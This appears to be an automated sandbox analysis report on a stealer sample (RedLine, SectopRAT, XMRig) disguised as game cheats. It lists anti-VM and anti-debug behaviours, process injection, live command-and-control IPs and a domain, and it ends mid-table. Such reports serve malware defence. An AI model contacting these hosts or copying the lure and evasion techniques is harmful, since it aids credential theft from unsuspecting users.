Analysis Overview
SHA256
d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2
Threat Level: Known bad
The file d42bb7f95b50972680b8a5f2f68ab5bee5450fc45cf15612d45cc00b1b65f0c2 was found to be: Known bad.
Malicious Activity Summary
Mercurial Grabber Stealer
SectopRAT
RedLine payload
Mercurialgrabber family
Redline family
Xmrig family
SectopRAT payload
xmrig
RedLine
Sectoprat family
Looks for VirtualBox Guest Additions in registry
XMRig Miner payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
System Binary Proxy Execution: Regsvcs/Regasm
Command and Scripting Interpreter: PowerShell
Looks for VMWare Tools registry key
Executes dropped EXE
Checks BIOS information in registry
Checks computer location settings
Loads dropped DLL
Themida packer
Reads user/profile data of web browsers
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Maps connected drives based on registry
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Program crash
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious use of UnmapMainImage
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Checks SCSI registry key(s)
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 16:29
Signatures
Mercurialgrabber family
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
133s
Max time network
150s
Command Line
Signatures
Reads user/profile data of web browsers
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe
"C:\Users\Admin\AppData\Local\Temp\Kiddions Mod MENU.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 185.182.82.35:4420 | tcp | |
| NL | 185.182.82.35:4420 | tcp | |
| NL | 185.182.82.35:4420 | tcp | |
| NL | 185.182.82.35:4420 | tcp | |
| NL | 185.182.82.35:4420 | tcp | |
| NL | 185.182.82.35:4420 | tcp | |
| NL | 185.182.82.35:4420 | tcp |
Files
memory/2936-0-0x000007FEF62E3000-0x000007FEF62E4000-memory.dmp
memory/2936-1-0x0000000000010000-0x000000000003A000-memory.dmp
memory/2936-2-0x000007FEF62E0000-0x000007FEF6CCC000-memory.dmp
memory/2936-21-0x000007FEF62E3000-0x000007FEF62E4000-memory.dmp
memory/2936-22-0x000007FEF62E0000-0x000007FEF6CCC000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
130s
Max time network
141s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2492 set thread context of 2988 | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 109.248.201.150:63757 | tcp | |
| RU | 109.248.201.150:63757 | tcp | |
| RU | 109.248.201.150:63757 | tcp | |
| RU | 109.248.201.150:63757 | tcp | |
| RU | 109.248.201.150:63757 | tcp |
Files
memory/2492-0-0x000000007411E000-0x000000007411F000-memory.dmp
memory/2492-1-0x00000000011C0000-0x0000000001304000-memory.dmp
memory/2492-2-0x0000000074110000-0x00000000747FE000-memory.dmp
memory/2492-3-0x000000007411E000-0x000000007411F000-memory.dmp
memory/2492-4-0x0000000074110000-0x00000000747FE000-memory.dmp
memory/2492-5-0x00000000003F0000-0x0000000000412000-memory.dmp
memory/2988-10-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2988-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2988-6-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2988-8-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2988-11-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2988-14-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2988-21-0x0000000074110000-0x00000000747FE000-memory.dmp
memory/2492-20-0x0000000074110000-0x00000000747FE000-memory.dmp
memory/2988-19-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2988-16-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2988-22-0x0000000074110000-0x00000000747FE000-memory.dmp
memory/2988-23-0x0000000074110000-0x00000000747FE000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3972 set thread context of 1612 | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"
C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe
"C:\Users\Admin\AppData\Local\Temp\Vape Patch.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | jonaianell.xyz | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
Files
memory/3972-0-0x0000000074BDE000-0x0000000074BDF000-memory.dmp
memory/3972-1-0x0000000000B50000-0x0000000000BB4000-memory.dmp
memory/3972-2-0x0000000005560000-0x00000000055D6000-memory.dmp
memory/3972-3-0x00000000054E0000-0x00000000054FE000-memory.dmp
memory/3972-4-0x0000000074BD0000-0x0000000075380000-memory.dmp
memory/3972-5-0x0000000005D00000-0x00000000062A4000-memory.dmp
memory/1612-6-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vape Patch.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/1612-9-0x0000000005450000-0x0000000005A68000-memory.dmp
memory/3972-10-0x0000000074BD0000-0x0000000075380000-memory.dmp
memory/1612-12-0x0000000074BD0000-0x0000000075380000-memory.dmp
memory/1612-11-0x0000000004F60000-0x0000000004F72000-memory.dmp
memory/1612-13-0x0000000005000000-0x000000000503C000-memory.dmp
memory/1612-14-0x0000000005040000-0x000000000508C000-memory.dmp
memory/1612-15-0x0000000074BD0000-0x0000000075380000-memory.dmp
memory/1612-16-0x00000000052B0000-0x00000000053BA000-memory.dmp
memory/1612-17-0x0000000074BD0000-0x0000000075380000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20241023-en
Max time kernel
140s
Max time network
146s
Command Line
Signatures
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Bird.exe
"C:\Users\Admin\AppData\Local\Temp\Bird.exe"
Network
| Country | Destination | Domain | Proto |
| FI | 65.21.103.71:56458 | tcp | |
| FI | 65.21.103.71:56458 | tcp | |
| FI | 65.21.103.71:56458 | tcp | |
| FI | 65.21.103.71:56458 | tcp | |
| FI | 65.21.103.71:56458 | tcp | |
| FI | 65.21.103.71:56458 | tcp |
Files
memory/1972-0-0x00000000008B0000-0x0000000000F0E000-memory.dmp
memory/1972-1-0x00000000763F1000-0x00000000763F2000-memory.dmp
memory/1972-14-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-20-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-19-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-18-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-17-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-16-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-15-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-13-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-12-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-11-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-10-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-9-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-8-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-7-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-6-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-5-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-4-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-3-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-2-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-25-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-26-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-27-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-28-0x00000000008B0000-0x0000000000F0E000-memory.dmp
memory/1972-29-0x00000000008B0000-0x0000000000F0E000-memory.dmp
memory/1972-30-0x00000000763F1000-0x00000000763F2000-memory.dmp
memory/1972-31-0x00000000763E0000-0x00000000764F0000-memory.dmp
memory/1972-33-0x00000000763E0000-0x00000000764F0000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
137s
Max time network
151s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2596 set thread context of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"
C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"
C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"
Network
| Country | Destination | Domain | Proto |
| DE | 136.244.80.139:40533 | tcp | |
| DE | 136.244.80.139:40533 | tcp | |
| DE | 136.244.80.139:40533 | tcp | |
| DE | 136.244.80.139:40533 | tcp | |
| DE | 136.244.80.139:40533 | tcp | |
| DE | 136.244.80.139:40533 | tcp |
Files
memory/2596-0-0x0000000073EFE000-0x0000000073EFF000-memory.dmp
memory/2596-1-0x0000000000060000-0x00000000000FA000-memory.dmp
memory/2596-2-0x0000000073EF0000-0x00000000745DE000-memory.dmp
memory/2316-13-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2316-11-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2316-16-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2596-17-0x0000000073EF0000-0x00000000745DE000-memory.dmp
memory/2316-5-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2316-9-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2316-3-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2316-8-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2316-7-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2316-18-0x0000000073EF0000-0x00000000745DE000-memory.dmp
memory/2316-19-0x0000000073EF0000-0x00000000745DE000-memory.dmp
memory/2316-20-0x0000000073EF0000-0x00000000745DE000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
138s
Max time network
150s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3880 set thread context of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"
C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"
C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe
"C:\Users\Admin\AppData\Local\Temp\CSGO FREE HACK.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| DE | 136.244.80.139:40533 | tcp | |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| DE | 136.244.80.139:40533 | tcp | |
| DE | 136.244.80.139:40533 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| DE | 136.244.80.139:40533 | tcp | |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| DE | 136.244.80.139:40533 | tcp | |
| DE | 136.244.80.139:40533 | tcp |
Files
memory/3880-0-0x0000000074B3E000-0x0000000074B3F000-memory.dmp
memory/3880-1-0x0000000000460000-0x00000000004FA000-memory.dmp
memory/3880-2-0x0000000004E60000-0x0000000004ED6000-memory.dmp
memory/3880-3-0x00000000029C0000-0x00000000029DE000-memory.dmp
memory/3880-4-0x0000000074B30000-0x00000000752E0000-memory.dmp
memory/3880-5-0x00000000055C0000-0x0000000005B64000-memory.dmp
memory/3656-6-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3880-9-0x0000000074B30000-0x00000000752E0000-memory.dmp
memory/3656-10-0x0000000074B30000-0x00000000752E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CSGO FREE HACK.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/3656-11-0x0000000005290000-0x0000000005322000-memory.dmp
memory/3656-13-0x00000000054C0000-0x00000000054D2000-memory.dmp
memory/3656-12-0x0000000006300000-0x0000000006918000-memory.dmp
memory/3656-14-0x0000000006070000-0x00000000060AC000-memory.dmp
memory/3656-15-0x00000000061C0000-0x000000000620C000-memory.dmp
memory/3656-16-0x0000000074B30000-0x00000000752E0000-memory.dmp
memory/3656-17-0x0000000007C90000-0x0000000007D9A000-memory.dmp
memory/3656-18-0x0000000074B30000-0x00000000752E0000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
149s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3916 set thread context of 4476 | N/A | C:\Users\Admin\AppData\Local\Temp\Installer.exe | C:\Users\Admin\AppData\Local\Temp\Installer.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Installer.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Installer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Installer.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Installer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Installer.exe"
C:\Users\Admin\AppData\Local\Temp\Installer.exe
C:\Users\Admin\AppData\Local\Temp\Installer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4476 -ip 4476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 12
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/3916-0-0x00000000752CE000-0x00000000752CF000-memory.dmp
memory/3916-1-0x0000000000800000-0x0000000000912000-memory.dmp
memory/3916-2-0x00000000752C0000-0x0000000075A70000-memory.dmp
memory/3916-3-0x0000000005940000-0x0000000005EE4000-memory.dmp
memory/3916-4-0x0000000005390000-0x0000000005422000-memory.dmp
memory/3916-5-0x0000000005350000-0x000000000535A000-memory.dmp
memory/3916-6-0x00000000056F0000-0x0000000005712000-memory.dmp
memory/4476-7-0x0000000000400000-0x0000000000420000-memory.dmp
memory/3916-9-0x00000000752C0000-0x0000000075A70000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
155s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2996 set thread context of 2180 | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
